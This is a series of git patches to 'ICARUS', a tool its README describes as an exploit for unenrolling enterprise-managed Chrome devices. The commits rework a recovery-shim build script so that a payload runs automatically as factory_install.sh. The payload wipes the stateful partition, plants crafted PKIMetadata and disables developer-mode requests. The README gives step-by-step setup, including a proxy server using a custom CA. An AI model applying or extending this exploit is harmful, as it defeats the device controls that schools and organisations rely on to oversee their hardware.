From b1a4ce7285c3b899994878244840f9aca59ac5c3 Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sat, 25 Jan 2025 22:26:08 -0500 Subject: [PATCH 1/8] make inshim.sh autorun --- modify.sh | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modify.sh b/modify.sh index e89a32e..04e1fcd 100644 --- a/modify.sh +++ b/modify.sh @@ -84,14 +84,13 @@ mount -o rw "$LOOP_DEV"p1 "$MOUNT_DIR" mkdir -p "$MOUNT_DIR/usr/share/packeddata" cp -rvf "./out/." "$MOUNT_DIR/usr/share/packeddata" mkdir -p "$MOUNT_DIR"/usr/bin -cp "inshim.sh" "$MOUNT_DIR/usr/bin/inshim.sh" umount "$MOUNT_DIR" enable_rw_mount "$LOOP_DEV"p3 mount "$LOOP_DEV"p3 "$MOUNT_DIR" -echo "bash" > "$MOUNT_DIR/usr/sbin/factory_install.sh" +cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh" umount "$MOUNT_DIR" sync sync sync -echo "success!" \ No newline at end of file +echo "success!" From 21eeeeff52232a1d824640e5f238bf63cc210a6a Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sat, 25 Jan 2025 22:34:32 -0500 Subject: [PATCH 2/8] WHY ARE YOU EDITING MAIN --- README.md | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/README.md b/README.md index 1cef0a9..845216a 100644 --- a/README.md +++ b/README.md @@ -27,11 +27,7 @@ Now, to modify the shim with the generated PKIMetadata: - `bash modify.sh ` -Now boot the shim, and in the terminal of the shim, run these commands: - -`mount /dev/disk/by-label/STATE /mnt/stateful_partition` - -`bash /mnt/stateful_partition/usr/bin/inshim.sh` +Now boot the shim, and ICARUS will attempt to modify your stateful partition. ### Server setup Requirements: npm, node From 6e1cb988f76d539eb5e7774918dbf41de88337b9 Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sat, 25 Jan 2025 22:35:20 -0500 Subject: [PATCH 3/8] fail statements + error handling --- inshim.sh | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/inshim.sh b/inshim.sh index 3a7c938..79c41d2 100644 --- a/inshim.sh +++ b/inshim.sh @@ -1,6 +1,11 @@ #!/bin/bash -[ "$EUID" -ne 0 ] && echo "Run this as root" +[ "$EUID" -ne 0 ] && fail "Not running as root, this shouldn't happen! Failing." + +fail() { + printf "%b\n" "$*" >&2 || : + sleep 1d +} get_largest_cros_blockdev() { local largest size dev_name tmp_size remo @@ -31,15 +36,15 @@ format_part_number() { mount /dev/disk/by-label/STATE /mnt/stateful_partition/ cros_dev="$(get_largest_cros_blockdev)" if [ -z "$cros_dev" ]; then - echo "No CrOS SSD found on device. Failing." - exit 1 + echo "No CrOS SSD found on device. Failing." + sleep 1d fi stateful=$(format_part_number "$cros_dev" 1) -mkfs.ext4 -F "$stateful" # This only wipes the stateful partition -mount "$stateful" /tmp +mkfs.ext4 -F "$stateful" || fail "Failed to wipe stateful." # This only wipes the stateful partition +mount "$stateful" /tmp || fail "Failed to mount stateful." mkdir -p /tmp/unencrypted cp /mnt/stateful_partition/usr/share/packeddata/. /tmp/unencrypted/ -rvf chown 1000 /tmp/unencrypted/PKIMetadata -R rm /tmp/.developer_mode umount /tmp -crossystem disable_dev_request=1 +crossystem disable_dev_request=1 || fail "Failed to set disable_dev_request." From b03b61f5e76daa9cda5d5f1c2854fc8a30fbb11e Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sun, 26 Jan 2025 11:46:52 -0500 Subject: [PATCH 4/8] Add troubleshooting section --- README.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/README.md b/README.md index 845216a..f1af1e5 100644 --- a/README.md +++ b/README.md @@ -40,6 +40,21 @@ Reboot the device. You'll boot into verified mode. Once you have your server run - Set HTTPS IP to the IP you used to host the proxy server. - Resume setup and your device will unenroll. +## Troubleshooting + +
+ During building, everything starting from root was copied into original! + + Please run ``git pull`` on your local copy. This bug has been fixed. +
+ +
+ My device says "Can't reach Google"! + + - Make sure your device and the server are connected to the same network + - If that didn't work, powerwash your device and re-run the modified shim, and keep the server running. +
+ ## Credits - [MunyDev](https://github.com/MunyDev) - Creating this exploit - [Archimax](https://github.com/EnterTheVoid-x86) - Cleaning up get_original_data.sh and inshim.sh + README changes From 249b72beb3419e2ddebb5f25f60f2d61106d4db2 Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sun, 26 Jan 2025 11:51:56 -0500 Subject: [PATCH 5/8] just incase --- modify.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/modify.sh b/modify.sh index 04e1fcd..c2c76eb 100644 --- a/modify.sh +++ b/modify.sh @@ -88,6 +88,7 @@ umount "$MOUNT_DIR" enable_rw_mount "$LOOP_DEV"p3 mount "$LOOP_DEV"p3 "$MOUNT_DIR" cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh" +chmod +x "$MOUNT_DIR/usr/sbin/factory_install.sh" umount "$MOUNT_DIR" sync From 8ee597869c598ad17a471fe19a4d958dbb61d9f3 Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sun, 26 Jan 2025 16:37:16 -0500 Subject: [PATCH 6/8] Update README.md --- README.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index f1af1e5..8ebf82c 100644 --- a/README.md +++ b/README.md @@ -12,12 +12,15 @@ An exploit for Chrome devices which allows people to unenroll devices with devic ## Setup and installation instructions Clone the repo with ``git clone --recursive https://github.com/MunyDev/icarus/`` and change directory to it. -Set up the environment by running the following commands (Make sure you have both python3 and python3-venv installed beforehand): +Set up the environment by running the following commands (Make sure you have python3, python3-venv, and protobuf installed beforehand): - `make setup-venv` - `make enter-venv` - `make setup-python` - `make build-packed-data` + +Before continuing, open Chrome on your build machine and go to chrome://components. This allows us to generate the nessecary data. + - `bash get_original_data.sh` - `bash make_out.sh myCA.der` From 3849077794920cb1362fac7384b4abab105dedc9 Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sun, 26 Jan 2025 16:47:19 -0500 Subject: [PATCH 7/8] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8ebf82c..8df0455 100644 --- a/README.md +++ b/README.md @@ -19,7 +19,7 @@ Set up the environment by running the following commands (Make sure you have pyt - `make setup-python` - `make build-packed-data` -Before continuing, open Chrome on your build machine and go to chrome://components. This allows us to generate the nessecary data. +Before continuing, open Chrome on your build machine and go to chrome://components. Press CTRL + F and search for "PKIMetadata". Once you find it, press "Check for Updates". Make sure it says up-to-date before continuing (and that the version is below 2000.) - `bash get_original_data.sh` - `bash make_out.sh myCA.der` From 1f60d03f443a70f669755c93ca572a07d6999960 Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sun, 26 Jan 2025 16:58:42 -0500 Subject: [PATCH 8/8] prompt for reboot --- inshim.sh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/inshim.sh b/inshim.sh index 79c41d2..0325761 100644 --- a/inshim.sh +++ b/inshim.sh @@ -48,3 +48,5 @@ chown 1000 /tmp/unencrypted/PKIMetadata -R rm /tmp/.developer_mode umount /tmp crossystem disable_dev_request=1 || fail "Failed to set disable_dev_request." +read -p "Finished! Press enter to reboot." +reboot